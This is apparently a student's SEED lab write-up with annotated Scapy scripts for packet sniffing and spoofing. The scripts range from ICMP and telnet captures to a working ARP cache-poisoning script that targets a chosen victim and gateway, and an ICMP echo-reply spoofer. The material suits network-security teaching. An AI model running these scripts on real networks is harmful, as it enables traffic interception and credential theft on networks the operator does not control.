SEEDLAB_Packet Sniffing and Spoofing Lab
- Capture only ICMP packets
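#-*-coding:utf-8-*-
from scapy.all import *


def print_pkt(pkt):
    """sniff() callback: dump every field of the captured packet to stdout."""
    pkt.show()


# BPF filter "icmp" keeps only ICMP. sniff() blocks until interrupted; because
# store is not 0, every captured packet is also kept in memory and returned.
pkt = sniff(iface="ens33", filter="icmp", prn=print_pkt)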
* Capture any TCP packet that comes from a particular IP and has destination port number 23
```python
#-*-coding:utf-8-*-
from scapy.all import *
def print_pkt(pkt):
    """sniff() callback: dump the packet's full dissection to stdout."""
    dump = pkt.show
    dump()
# BPF: "tcp net 192.168.209.131" (a full dotted quad, so effectively that one
# host) "and tcp dst port 23" (telnet). NOTE(review): "net" with no src/dst
# qualifier matches either direction; for "comes from a particular IP" a
# "src host" qualifier would be the precise form — confirm which is intended.
pkt = sniff(iface="ens33",filter="tcp net 192.168.209.131 and tcp dst port 23",prn=print_pkt)
- Capture packets that come from or go to a particular subnet. You can pick any subnet, such as 128.230.0.0/16; you should not pick the subnet that your VM is attached to.
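#-*-coding:utf-8-*-
from scapy.all import *


def print_pkt(pkt):
    """sniff() callback: dump every field of the captured packet to stdout."""
    pkt.show()


# BPF "net 192.168.202" is shorthand for 192.168.202.0/24 and, with no src/dst
# qualifier, matches packets going to or coming from that range. The lab asks
# for a subnet other than the one the VM itself sits on.
pkt = sniff(iface="ens33", filter="net 192.168.202", prn=print_pkt)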
* send a packet
```python
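#-*-coding:utf-8-*-
from scapy.all import *

# Build an IP/ICMP packet by hand and send it at layer 3; Scapy fills in the
# source address and the link-layer header from its routing table.
a = IP()
a.dst = '192.168.202.1'
a.ttl = 3  # small TTL: the packet is dropped after three hops
b = ICMP()  # Scapy's default ICMP type is echo-request
p = a/b
send(p)
ls(a)  # list the IP layer's fields with their current values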
- Sniffing telnet
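#-*-coding:utf-8-*-
from scapy.all import *


def print_pkt(pkt):
    """sniff() callback: print the TCP payload of each captured segment.

    sprintf("%Raw.load%") renders the Raw layer's load field (Scapy prints
    "??" when the packet carries no Raw layer, e.g. pure ACKs). Telnet sends
    keystrokes and credentials in cleartext, which is why the payload is
    readable here at all and why SSH replaced it.
    """
    raw = pkt.sprintf("%Raw.load%")
    print(raw)  # parenthesised so it runs on both Python 2 and 3


pkt = sniff(iface="ens33", filter="tcp", prn=print_pkt)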
* Sniffing and then Spoofing
```python
#响应arp报文
#-*-coding:utf-8-*-
from scapy.all import *
def init_arp():
    """Broadcast three ARP requests that claim 192.168.20.1 is at this MAC.

    psrc and pdst are both 192.168.20.1, i.e. a gratuitous-style request for
    the gateway address. The sender MAC is hard-coded here (the later version
    reads it from the interface with get_if_hwaddr). Static ARP entries or
    Dynamic ARP Inspection on the switch are the usual mitigations.
    """
    ether = Ether()
    ether.dst = "ff:ff:ff:ff:ff:ff"  # link-layer broadcast
    ether.src = "00:0c:29:e1:95:00"  # hard-coded sender MAC
    arp = ARP()
    arp.psrc = '192.168.20.1'
    arp.hwsrc = '00:0c:29:e1:95:00'
    arp.pdst = '192.168.20.1'  # same as psrc: gratuitous-style request
    arp.hwdst = 'ff:ff:ff:ff:ff:ff'
    arp.op = 1  # opcode 1 = request (who-has)
    p = ether/arp
    for i in range(3):
        sendp(p)  # layer-2 send, so the Ether header above is used as-is
def sniff_spool_arp(pkt):
    """sniff() callback: answer each broadcast ARP frame with a forged reply.

    For a frame whose Ethernet destination is the broadcast address, build an
    ARP reply telling the requester that the address it asked about (pdst) is
    at the hard-coded VM MAC, and send it three times. The broadcast test stands
    in for checking pkt[ARP].op; nothing excludes the requests init_arp() sends
    from this machine, so those are answered too if sniff() sees them.
    """
    if pkt[0][Ether].dst == "ff:ff:ff:ff:ff:ff":
        a = ARP()
        a.pdst = pkt[0][ARP].psrc  # reply goes to whoever asked
        a.hwsrc = "00:0c:29:e1:95:00"  # the VM's MAC address
        a.psrc = pkt[0][ARP].pdst  # claim the IP that was asked about
        a.hwdst = pkt[0][ARP].hwsrc
        a.op = 2  # opcode 2 = reply (is-at)
        for i in range(3):
            send(a)  # layer-3 send: no explicit Ether header, unlike init_arp()
init_arp()  # announce first, then keep answering broadcast ARP requests
# store=0: run the callback only, do not retain captured packets in memory
pkt = sniff(iface="ens33",filter="arp",prn=sniff_spool_arp,store=0)
- 改进版arp欺骗
#-*-coding:utf-8-*-
from scapy.all import *
import sys
#-*-
def attack_host():
    """Unicast three forged ARP requests to the victim host.

    The ARP sender fields claim that gw_ip is at attacker_mac; the target
    fields name the victim (host / host_mac). Uses the module-level gw_ip,
    host, host_mac and attacker_mac assigned in the main block. op=1 is a
    request, so this presumably relies on the victim updating its cache from
    unsolicited requests — a static ARP entry for the gateway, or Dynamic ARP
    Inspection on the switch, prevents that.
    """
    ether = Ether()
    ether.dst = host_mac  # unicast to the victim, not broadcast
    ether.src = attacker_mac  # attacker's MAC
    arp = ARP()
    arp.psrc = gw_ip  # sender IP: the gateway's address...
    arp.hwsrc = attacker_mac  # ...paired with our MAC
    arp.pdst = host
    arp.hwdst = host_mac
    arp.op = 1  # opcode 1 = request (who-has)
    p = ether/arp
    for i in range(3):
        sendp(p)  # layer-2 send using the Ether header built above
def attack_gw():
    """Unicast three forged ARP requests to the gateway (mirror of attack_host).

    The ARP sender fields claim that host is at attacker_mac; the target
    fields name the gateway (gw_ip / gw_mac). Uses the module-level gw_ip,
    gw_mac, host and attacker_mac assigned in the main block.
    """
    ether = Ether()
    ether.dst = gw_mac  # unicast to the gateway
    ether.src = attacker_mac
    arp = ARP()
    arp.psrc = host  # sender IP: the victim's address...
    arp.hwsrc = attacker_mac  # ...paired with our MAC
    arp.pdst = gw_ip
    arp.hwdst = gw_mac
    arp.op = 1  # opcode 1 = request (who-has)
    p = ether/arp
    for i in range(3):
        sendp(p)  # layer-2 send using the Ether header built above
def sniff_spool_arp(pkt):
    """sniff() callback: reply to any captured ARP packet with a forged mapping.

    The reply tells the packet's sender (psrc / hwsrc) that the address it
    referred to (pdst) is at attacker_mac. Unlike the first version there is
    no broadcast test and still no check of pkt[ARP].op, so every frame that
    passes the BPF filter set in the main block — ARP replies included, and
    presumably this script's own outgoing replies if sniff() sees them — is
    answered; confirm that is intended. Uses the module-level attacker_mac.
    """
    a = ARP()
    a.pdst = pkt[ARP].psrc  # reply goes to whoever sent the frame
    a.hwsrc = attacker_mac  # attacker's MAC
    a.psrc = pkt[ARP].pdst  # claim the IP the frame referred to
    a.hwdst = pkt[ARP].hwsrc
    a.op = 2  # opcode 2 = reply (is-at)
    for i in range(3):
        send(a)  # layer-3 send: no explicit Ether header, Scapy supplies it
if name == ‘main‘:
    # NOTE(review): this line reads `if name == ‘main‘:` on the page; the
    # missing underscores of __name__ / '__main__' and the curly quotes look
    # like markdown/rendering damage — confirm against the original script.
    gw_ip = sys.argv[1]  # gateway IP, first CLI argument (no argc check: IndexError if missing)
    gw_mac = getmacbyip(gw_ip)  # resolved with a genuine ARP request
    host = sys.argv[2]  # victim IP, second CLI argument
    host_mac = getmacbyip(host)
    iface = get_working_if()
    attacker_mac = get_if_hwaddr(iface)  # this machine's MAC, read from the interface
    attack_host()
    attack_gw()
    # Only ARP traffic involving the two addresses reaches the callback.
    pkt_filter = "arp net "+host+" or arp net "+gw_ip
    # NOTE: iface from get_working_if() above is not used here; the capture is
    # pinned to ens33.
    pkt = sniff(iface="ens33",filter=pkt_filter,prn=sniff_spool_arp,store=0)
```python
#-*-coding:utf-8-*-
#响应icmp报文
from scapy.all import *
def send_icmp(pkt):
    """sniff() callback: answer a captured ICMP packet with a forged echo reply.

    Builds IP/ICMP/Raw with src and dst swapped, type 0 / code 0 (echo reply),
    and copies id, seq and payload so the reply matches the request. There is
    no check on the ICMP type, so any captured ICMP packet is answered — the
    Ether-source guard added in the improved version below suggests that the
    script's own replies were being captured and answered as well. A packet
    without a Raw layer raises IndexError at pkt[0][Raw].
    """
    a = IP()
    a.dst = pkt[0][IP].src  # swap addresses
    a.src = pkt[0][IP].dst
    b = ICMP()
    b.id = pkt[0][ICMP].id  # id/seq must match for the requester to pair the reply
    b.seq = pkt[0][ICMP].seq
    b.type = 0  # echo reply
    b.code = 0
    c = Raw()
    c.load = pkt[0][Raw].load  # echo the request payload back
    p = a/b/c
    send(p)
# sniff() runs until interrupted; without store=0 every captured packet is also
# retained in memory (and assigned to pkt on return).
pkt = sniff(iface="ens33",filter="icmp",prn=send_icmp)
- 改进版icmp欺骗
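#-*-coding:utf-8-*-
# answer ICMP packets
from scapy.all import *

iface = get_working_if()  # Scapy's choice of default interface
attacker_mac = get_if_hwaddr(iface)  # this machine's MAC; send_icmp skips frames we sent ourselves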
def send_icmp(pkt):
    """sniff() callback: forge an ICMP echo reply to a captured ICMP packet.

    Same construction as the first version (swap IP src/dst, copy id/seq,
    type 0 / code 0), but frames whose Ethernet source is this machine's own
    MAC (module-level attacker_mac) are skipped so the script does not answer
    the replies it sends itself. Still no check on the ICMP type or that a Raw
    layer is present.
    """
    if pkt[0][Ether].src != attacker_mac:
        a = IP()
        a.dst = pkt[0][IP].src  # swap addresses
        a.src = pkt[0][IP].dst
        b = ICMP()
        b.id = pkt[0][ICMP].id
        b.seq = pkt[0][ICMP].seq
        b.type = 0  # echo reply
        b.code = 0
        c = Raw()
        # NOTE(review): the earlier version copies pkt[0][Raw].load; here the
        # whole Raw layer object is assigned — confirm which is intended.
        c.load = pkt[0][Raw]
        p = a/b/c
        send(p)
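# store=0: run the callback only, do not retain captured packets in memory.
pkt = sniff(iface="ens33", filter="icmp", prn=send_icmp, store=0)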
* 受害机添加网关
`sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.20.1`
* 验证
攻击机先后run sniff_spoof_arp脚本和sniff_spoof_icmp脚本
![](https://raw.githubusercontent.com/Danie1233/img/master/run.png)
然后
受害主机ping一个不存活的地址,会收到响应,欺骗成功
![](https://raw.githubusercontent.com/Danie1233/img/master/pingisok.png)